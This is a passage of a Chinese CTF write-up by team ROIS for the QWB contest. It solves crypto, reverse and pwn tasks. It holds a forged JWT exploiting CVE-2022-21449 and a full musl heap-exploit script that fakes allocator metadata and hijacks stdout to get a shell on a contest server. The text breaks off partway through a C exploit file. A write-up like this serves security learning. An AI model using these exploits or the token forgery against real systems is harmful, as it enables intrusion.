L1ao
    • Create new note
    • Create a note from template
      • Sharing URL Link copied
      • /edit
      • View mode
        • Edit mode
        • View mode
        • Book mode
        • Slide mode
        Edit mode View mode Book mode Slide mode
      • Customize slides
      • Note Permission
      • Read
        • Only me
        • Signed-in users
        • Everyone
        Only me Signed-in users Everyone
      • Write
        • Only me
        • Signed-in users
        • Everyone
        Only me Signed-in users Everyone
      • Engagement control Commenting, Suggest edit, Emoji Reply
    • Invite by email
      Invitee

      This note has no invitees

    • Publish Note

      Share your work with the world Congratulations! 🎉 Your note is out in the world Publish Note

      Your note will be visible on your profile and discoverable by anyone.
      Your note is now live.
      This note is visible on your profile and discoverable online.
      Everyone on the web can find and read all notes of this public team.
      See published notes
      Unpublish note
      Please check the box to agree to the Community Guidelines.
      View profile
    • Commenting
      Permission
      Disabled Forbidden Owners Signed-in users Everyone
    • Enable
    • Permission
      • Forbidden
      • Owners
      • Signed-in users
      • Everyone
    • Suggest edit
      Permission
      Disabled Forbidden Owners Signed-in users Everyone
    • Enable
    • Permission
      • Forbidden
      • Owners
      • Signed-in users
    • Emoji Reply
    • Enable
    • Versions and GitHub Sync
    • Note settings
    • Note Insights New
    • Engagement control
    • Make a copy
    • Transfer ownership
    • Delete this note
    • Save as template
    • Insert from template
    • Import from
      • Dropbox
      • Google Drive
      • Gist
      • Clipboard
    • Export to
      • Dropbox
      • Google Drive
      • Gist
    • Download
      • Markdown
      • HTML
      • Raw HTML
Menu Note settings Note Insights Versions and GitHub Sync Sharing URL Create Help
Create Create new note Create a note from template
Menu
Options
Engagement control Make a copy Transfer ownership Delete this note
Import from
Dropbox Google Drive Gist Clipboard
Export to
Dropbox Google Drive Gist
Download
Markdown HTML Raw HTML
Back
Sharing URL Link copied
/edit
View mode
  • Edit mode
  • View mode
  • Book mode
  • Slide mode
Edit mode View mode Book mode Slide mode
Customize slides
Note Permission
Read
Only me
  • Only me
  • Signed-in users
  • Everyone
Only me Signed-in users Everyone
Write
Only me
  • Only me
  • Signed-in users
  • Everyone
Only me Signed-in users Everyone
Engagement control Commenting, Suggest edit, Emoji Reply
  • Invite by email
    Invitee

    This note has no invitees

    • Publish Note

    Share your work with the world Congratulations! 🎉 Your note is out in the world Publish Note

    Your note will be visible on your profile and discoverable by anyone.
    Your note is now live.
    This note is visible on your profile and discoverable online.
    Everyone on the web can find and read all notes of this public team.
    See published notes
    Unpublish note
    Please check the box to agree to the Community Guidelines.
    View profile
    Engagement control
    Commenting
    Permission
    Disabled Forbidden Owners Signed-in users Everyone
    Enable
    Permission
    • Forbidden
    • Owners
    • Signed-in users
    • Everyone
    Suggest edit
    Permission
    Disabled Forbidden Owners Signed-in users Everyone
    Enable
    Permission
    • Forbidden
    • Owners
    • Signed-in users
    Emoji Reply
    Enable
    Import from Dropbox Google Drive Gist Clipboard
       Owned this note    Owned this note      
    Published Linked with GitHub
    • Any changes
      Be notified of any changes
    • Mention me
      Be notified of mention me
    • Unsubscribe
    # 强网杯writeup by ROIS ## misc ### 签到 签到 ### 问卷 问卷 ## crypto ### myJWT CVE-2022-21449 ``` eyJ0eXAiOiJKV1QiLCJhbGciOiJteUVTIn0=.eyJpc3MiOiJxd2IiLCJuYW1lIjoiYWRtaW4iLCJhZG1pbiI6dHJ1ZSwiZXhwIjoxNjU5OTk5OTk5OTk5fQ==.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= ``` ### Factor ``` python from Crypto.Util.number import long_to_bytes def transform(x, y): res = [] while y: res.append(x // y) x, y = y, x % y return res def continued_fraction(sub_res): numerator, denominator = 1, 0 for i in sub_res[::-1]: denominator, numerator = numerator, i * numerator + denominator return denominator, numerator def sub_fraction(x, y): res = transform(x, y) res = list(map(continued_fraction, (res[0:i] for i in range(1, len(res))))) return res def wienerAttack(n1, n2): for (q2, q1) in sub_fraction(n1, n2): if q1 == 0: continue if n1 % q1 == 0 and q1 != 1: return (q1, q2) # challenge 1 r = 2 n11 = 801049932940568005269978912396585741498810389425615966036828877784238116634177290247194019425111606811005728521368879065336038221361037062407029836155148874719789714345603547779284558101833801155509762818376470874215789574939002212274399950433269775325144015468620263028557804618774240232988157961712628677901130814703917513004114547234375629747176834581166306552311075522669403347828095831520693563291249869832390698646691647204371133362254846234990175138047928703289833460734235302093916147489509206061923877623300596194317059884824322527532662470348274079800781120104946546063500763852622187404608639542858285661288293918912184354236687975919510300221932074135531028314170475917110204254042336116619335841213418990605590620842511615815443114612333881430920769002933370887494558640833005339906706603497809846863863967391543647049224309556936909768179259581851520214669904560467640473144481633920438487615788689262961741053146610554997224861331949716721056553499531186695425439163222802917813140266513735841447717418846360096652592844940362932171019143434080184728093326143821165097895058935372215708948088248596585127475770021962501262915274497478428868130455122612016408381607561200802267038869516896665387576895570245272035575637 n12 = 635401970340205725139325006504978344512744926958688031423448003992072769931808217486709574151492230879374574313457662436423263437792389711379687512056391117410807565492548718691166183372633151644917135272259770997096195518489056319350258673723095417922153182423913759272893696867426193704479752772511081457729513843682588951499551132432923147997238597538055902932123792252593514225328196541483451747314048080824405530742533473914329294346486691684904100406972073037050089861816604505650042953778360621934380815999541183067585498606053857125775979915077329566722531830089714823979965934190338538564188253271016367299890015449611141166780048763403252309160517164569110740561584100839212138661881615351382946813818078899882595313362934594951895560189003438775450675343590147821186953526262224973333962454561275321925151619178204499342339749637758100126893330994252902926509705617882239610380420830791088907378397226817514095468815228186716220057075095711894070032344613244803934541318573847029365563159918970404057137270884587905766828750387753130065274147902379993224780149663600462492281891320702134153853359393588902750423972068679293373333869389393970353760507436913233657422185531482023237384247535554666481760197851108297145147371 e11=1898839980562048754607069073527844852132536432440793106124181406514770178066775988232362054809850074774981836898118651469424148725970708199461113088705044905633592578936333918328544505910996746428679299419879472444790941363558025887620570856598548320246426354974395765243741646121743413447132297230365355148066914830856904433750379114692122900723772114991199979638987571559860550883470977246459523068862898859694461427148626628283198896659337135438506574799585378178678790308410266713256003479022699264568844505977513537013529212961573269494683740987283682608189406719573301573662696753903050991812884192192569737274321828986847640839813424701894578472933385727757445011291134961124822612239865 e12=1262647419018930022617189608995712260095623047273893811529510754596636390255564988827821761126917976430978175522450277907063247981106405519094560616378241247111698915199999363948015703788616554657275147338766805289909261129165025156078136718573006479030827585347458143645738353716189131209398056741864848486818076440355778886993462012533397208330925057305502653219173629466948635110352752162442552541812665607516753186595817376029707777599029040724727499952161261179707271814405907165207904499722122779096230563548011491932378429654764486855147873135769116637484240454596231092684424572258119768093562747249251518965380465994055049411715353547147466711949391814550591591830515262296556050946881 c11=18979511327426975645936984732782737165217332092805655747550406443960209507493506811471688957217003792679188427155591583024966608843371190136274378868083075515877811693937328204553788450031542610082653080302874606750443090466407543829279067099563572849101374714795279414177737277837595409805721290786607138569322435729584574023597293220443351227559400618351504654781318871214405850541820427562291662456382362148698864044961814456827646881685994720468255382299912036854657082505810206237294593538092338544641919051145900715456411365065867357857347860000894624247098719102875782712030938806816332901861114078070638796157513248160442185781635520426230183818695937457557248160135402734489627723104008584934936245208116232179751448263136309595931691285743580695792601141363221346329077184688857290503770641398917586422369221744736905117499140140651493031622040723274355292502182795605723573863581253354922291984335841915632076694172921289489383700174864888664946302588049384130628381766560976143458735712162489811693014419190718601945154153130272620025118408017441490090252674737105557818759190934585829634273698371996797545908125156282869589331913665938038870431655063063535672001112420959158339261862052308986374193671007982914711432579 c12=336587005671304527566745948355290412636261748969581976214239578621816863343117433524033533838636941679300497270909696775021031004312477997130741361709262822736904340641138652359632950455651920464042448022467664596484055174270895170499076347333381222768518599018520948098943626229061996126260154604038101543546588917619576702866444998578555907070990331574722135141778182631559802154493815687284077524469331290249057291163803290619701104007028836609832847351748020354798788508790258935718399783002069490123663345156902440501507117289747695510266461539019431610123351176227443612317037899257774045751487135646052309277098939919088029284437221840182769808850184827681307611389353392683707516141736067793897378911235819049432542758429901945202632117089595899280390575706266239252841152490534353760118231918190110043319877744119083811214707593122757409240645257409097436061825613686773916466122693168971062418046703969144004779270391320645495586024342668002497155358623795942692477164489475917351003149045087283510728981096449890130735055015075557614253867698702479920619299919816768972581273507837309179450374634916567083251630203067065663910073926990517108921490442919372774170201239734064819301693527366233007925670043499415100789027665 q1, q2 = wienerAttack(n11, n12) p1, p2 = sqrt(n11 // q1), sqrt(n12 // q2) assert n11 == (p1**r) * q1 assert n12 == (p2**r) * q2 phi1 = (p1**(r - 1)) * (p1 - 1) * (q1 - 1) phi2 = (p2**(r - 1)) * (p2 - 1) * (q2 - 1) d1 = inverse_mod(e11, phi1) d2 = inverse_mod(e12, phi2) m1 = pow(c11, d1, n11) m2 = pow(c12, d2, n12) assert c11 == pow(m1, e11, n11) assert c12 == pow(m2, e12, n12) # challenge 2 r = 7 n2 = 209798341155088334158217087474227805455138848036904381404809759100627849272231840321985747935471287990313456209656625928356468120896887536235496490078123448217785939608443507649096688546074968476040552137270080120417769906047001451239544719039212180059396791491281787790213953488743488306241516010351179070869410418232801398578982244984544906579574766534671056023774009163991804748763929626213884208260660722705479782932001102089367261720194650874553305179520889083170973755913964440175393646890791491057655226024046525748177999422035469428780228224800114202385209306803288475439775037067014297973202621118959024226798935588827359265962780792266516120013602384766460619793738405476219362508944225007365127768741191310079985425349292613888185378948854602285379329682053663283534930182589905986063348509703027498270111412063194971956202729807710253369312175636837558252924035002153389909587349043986253518050303628071319876207392440085675892353421232158925122721273720564784886530611286461575045181073744696415657043278123662980166364494583141297996445429477446442693717498789391918530672770193730629928408766563592081857706608049076318165712479742423149330311238462044666384622153280310696667586565906758451118241914402257039981388209 e1 = ZZ(m1) e2 = ZZ(m2) c2 = 18352572608055902550350386950073774530453857897248738030380007830701135570310622004368605208336922266513238134127496822199799761713782366178177809597137102612444147565578155260524747439899150012223027218489946124086276814899675563837669559795153349686434242738207425653079514376089070980797596457151965772460109519623572502109592612394316680202287712465721767341302234806130244551387296133051760893033194962691942040228545508895009195291106297581470066545991352668826197346830561010198417527057944507902143965634058848276017283478933675052993657822322866778994956205033704582047618324071045349072526540250707463112668579342537349567247810715604220690215313641329522674080146047291570752430231923566302463491877377617044768978997438596643458475128936850994934029476030136643053997549253792076260765459166618369864942681056864815996253315631930002738854235841120321870075261782250357506436825550088826469396508045912258303652912217151127280959435741419961721418428605515096160344688795655562889755165362006775317188009008288782691705879510655892181975003485714604340542378477388225736316682379616676770234557939471098919647053799313777248678455620231721202780830980063824003076308811540534492317719811588898727134190545533822501681653 PR.<x> = PolynomialRing(Zmod(n2)) f = e1*e2*x-(e2-e1) f = f.monic() # k = f.small_roots(X=2^700, beta=0.75, epsilon=0.05)[0] k = 3549384841973213309621072870106254602253656209014197632823411827739864720839737811030401306800875843661955913236834617545674409639259372934721570288281471569069146201536309734296340629562207991295283896 g = gcd(e1*e2*k-(e2-e1), n2) p = g^(1/(r-1)) q = n2 // (p^7) assert n2 == (p**r)*q phi = (p**(r-1))*(p-1)*(q-1) e2 = 0x10001 d2 = inverse_mod(e2, phi) b = pow(c2, d2, n2) assert c2 == pow(b, e2, n2) # challenge 3 r = 7 n3 = 539779851369541956878655738599584730199799866957191805784596190682932284216781781433367450841202917758999300635019369629627621029957135109806205877317954671312041249493462048283611940752235036153024920172209763260723728345918562258401803973624430150143563078517485996070862532682695228590709019451174548520135142052216785774589096706631010293690859363524584240662502290912412366366114571976050857239915691266377257797199583543940504695517331512813468837128344612227973709974625418257243011036826241599265375741977853552204640800449679679351666009764297016524814036295707311913711955324055690490892097177271718850857268982130811714517356073266905474635370690445031512184247179039751734276906533177939993769044135143389748416635981226449566039039202521305851567296884751935162651063209779647359922622084851547605090230221057349511482738300221222563908357379545905837110168948295030747460300104202323692732549831403834387939156877086852393515817984772384147449841124275061609701453997579569931391166586163299940486204581696722731952467570857217406030804590055255431828403195798003509083922294733709507134156466158642941338493323430671502043066148246348074878064089651235355282144209668143249348243220714471988019011613749340243917652821 e3 = 8179300978753084587812861894047395225516049110376948812109811319430275614612773726672345893359691900281432484382670047044697374818043512731533402576374645405477207239801498428774783768163880078495448747421425078521981578408638790336528372019271073712013371141939808017049399434858687299480461753638164719404612128939787055797762174745092074547412183349192156638711750872083313795551439465507724807626674514935170104573715458782366469587138508845980490673890245713729782917089910271980557159592807350504157192913530007199510144004848020221181558472160543018733124225266127379373751910439604459368078652499029070936707349862139053913745186413782066470461478961703013591655136140060879250067379283913798867648758171004535775565306842444545755351202796833177560656564652632975685912935281581268141803696686952259539945588609591385807620108279333498170028167338690235117003515264281843953984997958878272347778561933726792473981855755454522886321669676790813189668084373153897754540290867346751033567500922477317530445967753955221454744946208555394588111484610700789566547507402309549957740815535069057837915204852490930168843605732632328017129154852857227895362549146737618906180651623216848500491438142456250653458053922622240299736136335179639180898730269690699965799644757774472147210271111150769048976871249731156387939260749192370361488285775377622944817570292095201906142567403539151179209316853493906909989301225903409448461436855145 c3 = 113097822337683973761068913398570777162211043704088253732500045618770280334319497174908657828372816818344430304314992760410247741225285170975119344962728883084314382093407445567724674775086423808679124143380073906159023182353116556175251427048715466914368972746661938211846262612414049036821553068430149530397389927209475908905748728402722287875974303298260579839357610962198145974153609818939841880084892796820949226354126424023144300953584658958900737493704530725894948802258740332090822797815745616247879170037794873059391625680745994045522420168248552864215035136318711240256011217929372430302003068882829637056296413462078222453765071094277727760527662423010417144554652783429899139309180017349156600053882338180319473460877576898373222480215735280046214925463242092830060830764299787309912687294672319845054775281463150375545716818434962456139485501224661520991156961587158843064393883274763714930309353593180897123378717852182761518709151878662808890356934477932099818218743384674756674800089177733447066489275506387382342429495897972218764782517198727316942685748481956118012927027254979181519862451112593068440686462293151078537886822555211870303467014484443432209106264020502334805536091587252238173816637270028678636848763 b = ZZ(b) PR.<a> = PolynomialRing(Zmod(n3)) f = e3*a - b f = f.monic() # k = f.small_roots(X=2^700, beta=0.75, epsilon=0.05)[0] k = 16731588253866128571163910758846497670928988943944436618514118121761227689113110943465936457030051710610254169629932203082368465978112219532158626669990117160986135699541953274434781877420432743573801621 g = gcd(e3*k - b, n3) p = g^(1/(r-1)) q = n3 // (p^7) assert n3 == (p**r)*q phi = (p**(r-1))*(p-1)*(q-1) d3 = inverse_mod(e3, phi) flag = pow(c3, d3, n3) print(long_to_bytes(int(flag))) ``` ## reverse ### easyapk 加密函数在sub_554,这一坨: ```c delta = v173; while ( 1 ) { v145 = v179; *v141 = v143; if ( v143 >= *v145 ) break; count = 0; v147 = *v180; *v183 = *v180 + v143; *v182 = v184; *v142 = *(_DWORD *)(v147 + v143); *v107 = *(_DWORD *)(v147 + v143 + 4); *v103 = 0; v148 = time(0); v149 = v174; v150 = v175; v151 = v176; v152 = (v148 & 0x30000000) - (v148 & 0xC0000000) + 2 * (v148 & 0x40000000) + 0x35970C13; v142 = v177; *(_DWORD *)delta = (v152 ^ 0xF4170810 | 0x1C88647) + 2 * (v152 ^ 0xBA075AA); key = *v182; v199 = **v182; *v151 = key[1]; *v149 = key[2]; *v150 = key[3]; while ( 1 ) { *v122 = count; if ( count > 0x1F ) break; v154 = *v107; v155 = 2 * (*v103 | *(_DWORD *)delta) - (*(_DWORD *)delta ^ *v103); *v103 = v155; v156 = (2 * (v155 | v154) - (v155 ^ v154)) ^ (2 * (v199 | (16 * v154)) - (v199 ^ (16 * v154))) ^ (2 * (*v151 | (v154 >> 5)) - (*v151 ^ (v154 >> 5))); v157 = *v149; v158 = 2 * (v156 | *v142) - (v156 ^ *v142); *v142 = v158; v159 = (2 * (*v150 | (v158 >> 5)) - (*v150 ^ (v158 >> 5))) ^ (2 * (v157 | (16 * v158)) - (v157 ^ (16 * v158))) ^ (2 * (v158 | *v103) - (*v103 ^ v158)); *v107 = 2 * (v159 | *v107) - (v159 ^ *v107); count = (*v122 | 0xFFFFFFFE) - (*v122 & 0xFFFFFFFE) + 2 * (*v122 | 1) + 1; } v141 = v178; v160 = (_DWORD *)*v183; *v160 = *v142; v160[1] = *v107; v143 = (*v141 | 0xFFFFFFF7) - (*v141 & 0xFFFFFFF7) + 2 * (*v141 | 8) + 1; } ``` 鉴定为标准的tea加密,密钥是"01234567890abcdef" 最后要比对的加密数据在0x3E78, 抠下来解密,最后还要打个表转换一下: 解密: ```cpp= #include <stdio.h> #include <stdint.h> uint32_t enc_data[] = {0x5D94AA84, 0x14FA24A0, 0x2B560210, 0xB69BDD49, 0xAAEFEAD4,0x4B8CF4C6, 0x97FB8C9, 0xB5EC51D2}; char table1[] = "abcdefghijklmnopqrstuvwxyz"; char table2[] = "nopqrstuvwxyzabcdefghijklm"; void encrypt (uint32_t *v,uint32_t *k ){ uint32_t v0=v[0],v1=v[1],sum=0,i; uint32_t delta=0x9e3779b9; uint32_t k0=k[0],k1=k[1],k2=k[2],k3=k[3]; for(i=0;i<32;i++){ sum+=delta; v0+=((v1<<4)+k0)^(v1+sum)^((v1>>5)+k1); v1+=((v0<<4)+k2)^(v0+sum)^((v0>>5)+k3); } v[0]=v0;v[1]=v1; } void decrypt (uint32_t *v,uint32_t *k){ uint32_t v0=v[0],v1=v[1],sum=0xC6EF3720,i; uint32_t delta=0x9e3779b9; uint32_t k0=k[0],k1=k[1],k2=k[2],k3=k[3]; for (i=0;i<32;i++){ v1-=((v0<<4)+k2)^(v0+sum)^((v0>>5)+k3); v0-=((v1<<4)+k0)^(v1+sum)^((v1>>5)+k1); sum-=delta; } v[0]=v0;v[1]=v1; } int main() { uint32_t k[4]={0x33323130,0x37363534,0x62613938,0x66656463}; for(int i = 0;i < 8;i+=2){ decrypt(&enc_data[i],k); printf("%c%c%c%c%c%c%c%c",enc_data[i]&0xff,(enc_data[i]>>8)&0xff,(enc_data[i]>>16)&0xff,(enc_data[i]>>24)&0xff ,enc_data[i+1]&0xff,(enc_data[i+1]>>8)&0xff,(enc_data[i+1]>>16)&0xff,(enc_data[i+1]>>24)&0xff); } puts(""); return 0; } // synt{Vg_Vf_A0g_guNg_zHpu_unEqre} ``` 打表转换: ```python= table1 = "abcdefghijklmnopqrstuvwxyz" table2 = "nopqrstuvwxyzabcdefghijklm" table1_uppper = table1.upper() table2_uppper = table2.upper() flag = 'synt{Vg_Vf_A0g_guNg_zHpu_unEqre}' res = '' for i in flag: idx1 = table2.find(i) idx2 = table2_uppper.find(i) if idx1 != -1: res += table1[idx1] elif idx2 != -1: res += table1_uppper[idx2] else: res += i print(res) ``` ### GameMaster 使用dnspy调试 ,在console.exe 中的goldFunc中找到获取输入作弊码的相关代码,通过patch flag 来改变运行流程,执行到 binaryFormatter.Deserialize(serializationStream); 获取反序列化dll 最后是关键验证函数: ```c= private static void Check1(ulong x, ulong y, ulong z, byte[] KeyStream) { int num = -1; for (int i = 0; i < 320; i++) { x = (((x >> 29 ^ x >> 28 ^ x >> 25 ^ x >> 23) & 1UL) | x << 1); y = (((y >> 30 ^ y >> 27) & 1UL) | y << 1); z = (((z >> 31 ^ z >> 30 ^ z >> 29 ^ z >> 28 ^ z >> 26 ^ z >> 24) & 1UL) | z << 1); bool flag = i % 8 == 0; if (flag) { num++; } KeyStream[num] = (byte)((long)((long)KeyStream[num] << 1) | (long)((ulong)((uint)((z >> 32 & 1UL & (x >> 30 & 1UL)) ^ (((z >> 32 & 1UL) ^ 1UL) & (y >> 31 & 1UL)))))); } } ``` 使用z3来解决,python 脚本: ```python= from numpy import array from z3 import * def get_b(data,n): bin_str=['0']*(8-len(list(bin(data)[2:])))+list(bin(data)[2:]) print(bin_str) return int(bin_str[n]) #计算x,y,z def get_xyz(): s = Solver() x =BitVec('x',64) y =BitVec('y',64) z =BitVec('z',64) first=[101,5,80,213,163,26,59,38,19,6,173,189,198,166,140,183,42,247,223,24,106,20,145,37,24,7,22,191,110,179,227,5,62,9,13,17,65,22,37,5] # for i in range(len(first)): # data=first[::-1][i] # data_arr=['0']*(8-len(list(bin(data)[2:])))+list(bin(data)[2:]) # print(data_arr) num=-1 for j in range(320): x = (((x >> 29 ^ x >> 28 ^ x >> 25 ^ x >> 23) & 1) | x << 1) y = (((y >> 30 ^ y >> 27) & 1) | y << 1) z = (((z >> 31 ^ z >> 30 ^ z >> 29 ^ z >> 28 ^ z >> 26 ^ z >> 24) & 1) | z << 1) if(j % 8 == 0): num=num+1 print(num) tmp=get_b(first[num],j%8) s.add(tmp==((z >> 32 & 1 & (x >> 30 & 1)) ^ (((z >> 32 & 1) ^ 1) & (y >> 31 & 1)))) print(s.check()) m = s.model() print(str(m)) #[y = 868387187, x = 156324965, z = 3131229747] def get_key(array): key=[] for i in range(3): for j in range(4): key.append(array[i]>>j*8 &0xff) return key array0=[156324965,868387187,3131229747] key=get_key(array0) array5=[60,100,36,86,51,251,167,108,116,245,207,223,40,103,34,62,22,251,227] flag="" for i in range(len(array5)): array5[i]= array5[i]^ key[i%len(key)] flag+=chr(array5[i]) print(array5) print(flag) print("flag{"+flag+"}") ``` ## pwn ### usermanager musl 1.2.2题目,insert 替换的时候,对于全局变量的指针,没有进行更新,导致了uaf,泄露heapaddress。而且,tail删除后,依旧作为链表的tail,导致了重复的使用。musl常规思路,伪造meta,group,area,修改io,exit执行system, ```python= from pwn import * libc = ELF("./libc.so") #r=process(['./libc.so',"./UserManager"]) r=remote('59.110.212.61',23467) elf = ELF("./UserManager") #context.log_level = 'debug' def ch(i): r.sendlineafter(": ",str(i)) def add(id,size,name): ch(1) r.sendlineafter("Id:",str(id)) r.sendlineafter("length:",str(size)) r.sendlineafter("UserName:",name) def check(id): ch(2) r.sendlineafter("Id:",str(id)) def free(id): ch(3) r.sendlineafter("Id:",str(id)) def clear(): ch(4) add(0,0x38,b'0'*8) add(1,0x38,b'1'*8) add(2,0x38,b'2'*8) add(2,0x38,b'T'*8) add(3,0x10,b'x'*8) check(2) r.recvuntil(p64(0xdeadbeef)) heap_address = u64(r.recv(8)) print("heap_address: " ,hex(heap_address)) libc_base = heap_address-0x0b7d60 print("libc_base : ",hex(libc_base)) #system = libc_base+libc.sym['system'] system = libc_base+0x50a90 print(hex(libc.sym['system'])) stdout = libc_base+0x0b3da0 __malloc_context = 0x0b4ac0+libc_base ofl_head = libc_base+ 0x0b6e40+8 print("__malloc_context: ",hex(__malloc_context)) print("stdout : ",hex(stdout)) print("system : ",hex(system)) print("ofl_head: ",hex(ofl_head)) add(4,0x38,p64(2)+p64(__malloc_context)+p64(0x500)+p64(2)+p64(heap_address-0x40)+p64(heap_address-0xe0+0x60)) # check(2) r.recv(1) secret = u64(r.recv(8)) r.recv(0x10) free_meta = u64(r.recv(8)) avail_meta=u64(r.recv(8)) for i in range(5): r.recv(8) active=list() for i in range(64): active.append(u64(r.recv(8))) meta_base = active[3] print("secret : ",secret) print("p *(struct meta*) ",hex(meta_base)) #add(7,0x10,b'\xff'*8) #add(8,0x10,b'\xff'*8) free(4) add(4,0x38,p64(2)+p64(meta_base)+p64(0x500)+p64(2)+p64(heap_address-0x40)+p64(heap_address-0xe0+0x60)) print("+++++++++++++++++++++++++++++++++++++++") check(2) r.recv() for i in range(2): print(hex(u64(r.recv(8)))) aaaaa= u64(r.recv(8)) print("a real slot address",hex(aaaaa)) free(4) fake_chunk_address = libc_base+0x1050-0x6fe0 fakemeta_addr = fake_chunk_address-0x50 print("fake_meta_addr : ",hex(fakemeta_addr)) #fake_stdout_addr = aaaaa+0x430+0x50 fake_stdout_addr = libc_base+0xb7ac0 print("fake_stdout_addr:",hex(fake_stdout_addr)) print("fake_chunk_address ",hex(fake_chunk_address)) #add(4,0x38,p64(2)+p64(libc_base+0xb7870)+p64(0x140)+p64(2)+p64(heap_address-0x40)+p64(heap_address-0xe0+0x60)) add(4,0x38,p64(2)+p64(libc_base+0x1050-0x6fe0)+p64(0x100)+p64(2)+p64(heap_address-0x40)+p64(heap_address-0xe0+0x60)) add(5,0x50,b'x'*0x8) add(6,0x10,b'\xff'*8) #context.log_level='debug' fake_meta =b'\x00'*(4064)+p64(secret)+p64(0)*3 fake_meta += p64(ofl_head-0x8)+p64(fake_stdout_addr) #fakemta1 fake_meta +=p64(fakemeta_addr+0x40)+p64(0x3fe)+p64(0xa9)+p64(0) fake_meta +=p64(fakemeta_addr+0x1000)+p64(0x0000c00000000000) fake_meta +=p64(fakemeta_addr)+p64(0x0000800000000009) fake_meta +=b"AAAAAAAA" fake_meta = fake_meta.ljust((0x2000-0x20),b'\x00') fake_meta +=p64(secret)+p64(0)*3 #fake_area1 fake_meta += p64(0)+p64(0)+p64(fakemeta_addr+0x30)+p64(0x0)+p64(0x3c0)+p64(0) #fakemeta2 fake_stdfile =b'/bin/sh\x00'+p64(0)*6+p64(1)*2+p64(system)*2 fake_stdfile = fake_stdfile.ljust(0x50,b'\x00') ch(1) r.sendlineafter("Id:",str(7)) r.sendlineafter("length:",str(0x2030)) r.sendafter("UserName:",fake_meta) #context.log_level = 'debug' check(2) r.recv(2) for i in range(20): print(hex(u64(r.recv(8))) , hex(u64(r.recv(8)))) free(2) r.sendline("2") r.sendlineafter("Id:",str(2)) r.sendline("1") r.sendlineafter("Id:",str(9)) r.sendlineafter("length:",str(0x58)) r.sendafter("UserName:",fake_stdfile) ch(5) r.interactive() ``` 最大问题在于,本地搭建的环境与远程不一致,导致开始时的时候,很多数据不一致。 flag{daa69d44-7a60-4cb2-b308-95cc27b93e98} ### yakagame 调用除fight,merge等程序现有的函数之外的函数首次调用会使用map存储,第二次调用该函数时会迭代器遍历map,这个过程使用的索引v33是char类型会负数溢出进而修改cmd和score。 ![](https://i.imgur.com/uuChCRu.png) exp.c ```c #include <stdio.h> char weaponlist[0x100]; int fight(int idx) { printf("fight\n"); return 1; } void merge(int dst, int src) { weaponlist[dst] += weaponlist[src]; } void upgrade(char num) { weaponlist[0] = num; } void newweapon(int num) { weaponlist[0]=0; } void tiandongwanxiang() { weaponlist[0]=0; } void newweapon0(int num) {weaponlist[0]=0;} void newweapon1(int num) {weaponlist[0]=0;} void newweapon2(int num) {weaponlist[0]=0;} void newweapon3(int num) {weaponlist[0]=0;} void newweapon4(int num) {weaponlist[0]=0;} void newweapon5(int num) {weaponlist[0]=0;} void newweapon6(int num) {weaponlist[0]=0;} void newweapon7(int num) {weaponlist[0]=0;} void newweapon8(int num) {weaponlist[0]=0;} void newweapon9(int num) {weaponlist[0]=0;} void newweapon10(int num) {weaponlist[0]=0;} void newweapon11(int num) {weaponlist[0]=0;} void newweapon12(int num) {weaponlist[0]=0;} void newweapon13(int num) {weaponlist[0]=0;} void newweapon14(int num) {weaponlist[0]=0;} void newweapon15(int num) {weaponlist[0]=0;} void newweapon16(int num) {weaponlist[0]=0;} void newweapon17(int num) {weaponlist[0]=0;} void newweapon18(int num) {weaponlist[0]=0;} void newweapon19(int num) {weaponlist[0]=0;} void newweapon20(int num) {weaponlist[0]=0;} void newweapon21(int num) {weaponlist[0]=0;} void newweapon22(int num) {weaponlist[0]=0;} void newweapon23(int num) {weaponlist[0]=0;} void newweapon24(int num) {weaponlist[0]=0;} void newweapon25(int num) {weaponlist[0]=0;} void newweapon26(int num) {weaponlist[0]=0;} void newweapon27(int num) {weaponlist[0]=0;} void newweapon28(int num) {weaponlist[0]=0;} void newweapon29(int num) {weaponlist[0]=0;} void newweapon30(int num) {weaponlist[0]=0;} void newweapon31(int num) {weaponlist[0]=0;} void newweapon32(int num) {weaponlist[0]=0;} void newweapon33(int num) {weaponlist[0]=0;} void newweapon34(int num) {weaponlist[0]=0;} void newweapon35(int num) {weaponlist[0]=0;} void newweapon36(int num) {weaponlist[0]=0;} void newweapon37(int num) {weaponlist[0]=0;} void newweapon38(int num) {weaponlist[0]=0;} void newweapon39(int num) {weaponlist[0]=0;} void newweapon40(int num) {weaponlist[0]=0;} void newweapon41(int num) {weaponlist[0]=0;} void newweapon42(int num) {weaponlist[0]=0;} void newweapon43(int num) {weaponlist[0]=0;} void newweapon44(int num) {weaponlist[0]=0;} void newweapon45(int num) {weaponlist[0]=0;} void newweapon46(int num) {weaponlist[0]=0;} void newweapon47(int num) {weaponlist[0]=0;} void newweapon48(int num) {weaponlist[0]=0;} void newweapon49(int num) {weaponlist[0]=0;} void newweapon50(int num) {weaponlist[0]=0;} void newweapon51(int num) {weaponlist[0]=0;} void newweapon52(int num) {weaponlist[0]=0;} void newweapon53(int num) {weaponlist[0]=0;} void newweapon54(int num) {weaponlist[0]=0;} void newweapon55(int num) {weaponlist[0]=0;} void newweapon56(int num) {weaponlist[0]=0;} void newweapon57(int num) {weaponlist[0]=0;} void newweapon58(int num) {weaponlist[0]=0;} void newweapon59(int num) {weaponlist[0]=0;} void newweapon60(int num) {weaponlist[0]=0;} void newweapon61(int num) {weaponlist[0]=0;} void newweapon62(int num) {weaponlist[0]=0;} void newweapon63(int num) {weaponlist[0]=0;} void newweapon64(int num) {weaponlist[0]=0;} void newweapon65(int num) {weaponlist[0]=0;} void newweapon66(int num) {weaponlist[0]=0;} void newweapon67(int num) {weaponlist[0]=0;} void newweapon68(int num) {weaponlist[0]=0;} void newweapon69(int num) {weaponlist[0]=0;} void newweapon70(int num) {weaponlist[0]=0;} void newweapon71(int num) {weaponlist[0]=0;} void newweapon72(int num) {weaponlist[0]=0;} void newweapon73(int num) {weaponlist[0]=0;} void newweapon74(int num) {weaponlist[0]=0;} void newweapon75(int num) {weaponlist[0]=0;} void newweapon76(int num) {weaponlist[0]=0;} void newweapon77(int num) {weaponlist[0]=0;} void newweapon78(int num) {weaponlist[0]=0;} void newweapon79(int num) {weaponlist[0]=0;} void newweapon80(int num) {weaponlist[0]=0;} void newweapon81(int num) {weaponlist[0]=0;} void newweapon82(int num) {weaponlist[0]=0;} void newweapon83(int num) {weaponlist[0]=0;} void newweapon84(int num) {weaponlist[0]=0;} void newweapon85(int num) {weaponlist[0]=0;} void newweapon86(int num) {weaponlist[0]=0;} void newweapon87(int num) {weaponlist[0]=0;} void newweapon88(int num) 